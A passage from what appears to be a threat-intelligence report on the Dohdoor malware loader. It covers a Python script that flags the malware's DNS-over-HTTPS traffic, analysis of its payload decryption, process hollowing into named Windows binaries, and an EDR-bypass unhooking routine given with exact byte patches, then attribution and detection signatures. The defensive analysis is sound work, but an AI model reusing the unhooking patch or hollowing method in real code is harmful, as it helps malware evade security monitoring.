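    return qs.get("name", [rec["host"]])[0]


def is_mixed_case(name):
    # DNS names are case-insensitive, so a name that is neither all-lower nor all-upper
    # was written that way deliberately.
    return name != name.lower() and name != name.upper()


def evaluate(rec):
    """Return the rule names that fire for one proxy record, weak and strong indicators alike."""
    hits = []
    if "dns-json" in rec["accept"]:
        hits.append("doh_json_lookup")                  # weak: any JSON DoH client
    if rec["user_agent"].startswith("insomnia/11.3.0"):
        hits.append("doh_insomnia_user_agent")          # API-client UA quoted in the report
    name = looked_up_name(rec)
    if is_mixed_case(name):
        hits.append("mixed_case_hostname")
    if name.lower().rsplit(".", 1)[-1] in CAMPAIGN_TLDS:
        hits.append("campaign_tld")                     # weak on its own
    if C2_PATH.match(rec["path"]):
        hits.append("dohdoor_c2_uri_pattern")
    if rec["user_agent"] in DOHDOOR_UAS:
        hits.append("dohdoor_curl_user_agent")
    return hits


def scan(log_text):
    """Map 1-based line number -> fired rules, for lines that fired anything."""
    results = {}
    for lineno, line in enumerate(log_text.strip().splitlines(), start=1):
        hits = evaluate(parse_line(line))
        if hits:
            results[lineno] = hits
    return results


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, hits)
```

Pulling the `name=` parameter out of the DoH request is the key step: the domain being resolved never appears in conventional DNS telemetry, but with TLS inspection or proxy logging it is visible inside the HTTPS request, and the mixed-case and TLD checks can then be applied to it just as they would to a plaintext query.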

Dohdoor receives an encrypted payload from the C2 server. The encrypted payload undergoes custom XOR-SUB decryption using a position-dependent cipher. The encrypted data has a 4:1 expansion ratio: the encrypted data is four times larger than the decrypted data. The decryption routine of Dohdoor operates in two modes: a vectorized single instruction, multiple data (SIMD) method for bulk processing and a simpler loop to handle the remaining encrypted data.

The main decryption routine processes 16-byte blocks of the encrypted data using the SIMD instructions. It calculates position-dependent indexes, retrieves encrypted data and applies XOR-SUB decryption using the 32-byte key. This decryption routine repeats four times per iteration until it reaches the end of a 16-byte block.  

Figure 8. Dohdoor function snippet showing the single instruction, multiple data (SIMD) instructions.

For the encrypted data that remains outside the 16-byte blocks, it applies the decryption formula “decrypted[i] = encrypted[i*4] - i - 0x26”. Every fourth byte is sampled from the encrypted data buffer; the position index is subtracted to make the decryption position-dependent, and finally the constant 0x26 is subtracted.

Figure 9. Snippet of Dohdoor showing the position dependent decryption algorithm. 

Once the payload is decrypted, Dohdoor injects the payload binary into a legitimate Windows process using the process hollowing technique. The actor targets legitimate Windows binaries by hardcoding their executable paths, and Dohdoor launches them in a suspended state. It then performs process hollowing, injecting the decrypted payload before resuming the process, allowing the payload to run stealthily. In this campaign, the legitimate Windows binaries targeted for process hollowing are listed below:

  • C:\Windows\System32\OpenWith.exe 
  • C:\Windows\System32\wksprt.exe 
  • C:\Program Files\Windows Photo Viewer\ImagingDevices.exe 
  • C:\Program Files\Windows Mail\wab.exe 

Talos observed that Dohdoor implements an EDR bypass technique by unhooking system calls (syscalls) to evade EDR products that monitor Windows API calls through user-mode hooks in ntdll.dll. Security products usually patch the beginning of ntdll functions to redirect execution through their monitoring code before allowing the original system call to execute.

Evasive malware usually detects system call hooks by reading the first bytes of critical ntdll functions and comparing them against the expected syscall stub pattern, which begins with "mov r10, rcx; mov eax, syscall_number". If the bytes match the expected pattern, the function is not hooked; if hooks are detected, the malware can write replacement code that either restores the original instructions or creates a direct syscall trampoline that bypasses the hooked function entirely.

Dohdoor achieves this by locating ntdll.dll with the hash “0x28cc” and finding NtProtectVirtualMemory with the hash “0xbc46c894”. It then reads the first 32 bytes of the function using ReadProcessMemory, which is resolved dynamically during execution, and compares them with the syscall stub pattern in hexadecimal “4C 8B D1 B8 FF 00 00 00”, which corresponds to the assembly instructions “mov r10, rcx; mov eax, 0FFh”. If the byte pattern matches, it writes a 6-byte patch in hexadecimal “B8 BB 00 00 00 C3”, which corresponds to the assembly instructions “mov eax, 0BBh; ret”, creating a direct syscall stub that bypasses any user-mode hooks.

Figure 10. Dohdoor function showing the syscall unhooking EDR bypass technique.

During our research, we were unable to find a payload that was downloaded and implanted by Dohdoor. Still, we found that one of the C2 hosts associated with this campaign had a JA3S hash of “466556e923186364e82cbdb4cad8df2c” and the TLS certificate serial number “7FF31977972C224A76155D13B6D685E3” according to OSINT data. The JA3S hash and serial number found resemble those of the default Cobalt Strike server, indicating that the threat actor was potentially using the Cobalt Strike Beacon as the payload to establish a persistent connection to the victim network and execute further payloads.

Low confidence TTPs overlap with North Korean actors’ techniques 

Talos assesses with low confidence that UAT-10027 is North Korea-nexus, based on the similarities in tactics, techniques, and procedures (TTPs) with those of the known North Korean APT actor Lazarus.

We observed similarities in the technical characteristics of Dohdoor and Lazarloader, a tool belonging to the North Korean APT Lazarus. The key similarity is the use of a custom XOR-SUB position-dependent decryption technique and the specific hexadecimal constant (0x26) in the subtraction operation. Additionally, the NTDLL unhooking technique used to bypass EDR monitoring by identifying and restoring system call stubs aligns with features found in earlier Lazarloader variants.

The implementation of DNS-over-HTTPS (DoH) via Cloudflare’s DNS service to circumvent traditional DNS security, the process hollowing technique used to reflectively execute the decrypted payload in targeted legitimate Windows binaries like ImagingDevices.exe, and the sideloading of malicious DLLs under the disguised file name “propsys.dll” have all been observed in the tradecraft of the North Korean APT actor Lazarus.

In addition to the similarities in the tools' technical characteristics, the use of multiple top-level domains (TLDs), including “.design”, “.software”, and “.online”, with varying case patterns also aligns with the operational preferences of Lazarus. While UAT-10027's malware shares technical overlaps with the Lazarus Group, the campaign’s focus on the education and health care sectors deviates from Lazarus’ typical profile of cryptocurrency and defense targeting. However, Talos has historically seen North Korean APT actors target the health care sector using Maui ransomware, and another North Korean APT group, Kimsuky, has targeted the education sector, highlighting the overlap in victimology between UAT-10027 and other North Korean APTs.

Coverage

The following ClamAV signatures detect and block this threat:

  • Win.Loader.Dohdoor-10059347-0 
  • Win.Loader.Dohdoor-10059535-0 
  • Ps1.Loader.Dohdoor-10059533-0 
  • Ps1.Loader.Dohdoor-10059534-0 

The following SNORT® Rules (SIDs) detect and block this threat: 

  • Snort2 – 65950, 65951, 65949
  • Snort3 – 301407, 65949

Indicators of compromise (IOCs) 

The IOCs for this threat are also available at our GitHub repository here

He Leaked the Secrets of a Southeast Asian Scam Compound. Then He Had to Get Out Alive

27 January 2026, 08:00
A source trapped inside an industrial-scale scamming operation contacted me, determined to expose his captors’ crimes—and then escape. This is his story.

Revealed: Leaked Chats Expose the Daily Life of a Scam Compound’s Enslaved Workforce

27 January 2026, 08:00
A whistleblower trapped inside a “pig butchering” scam compound gave WIRED a vast trove of its internal materials—including 4,200 pages of messages that lay out its operations in unprecedented detail.
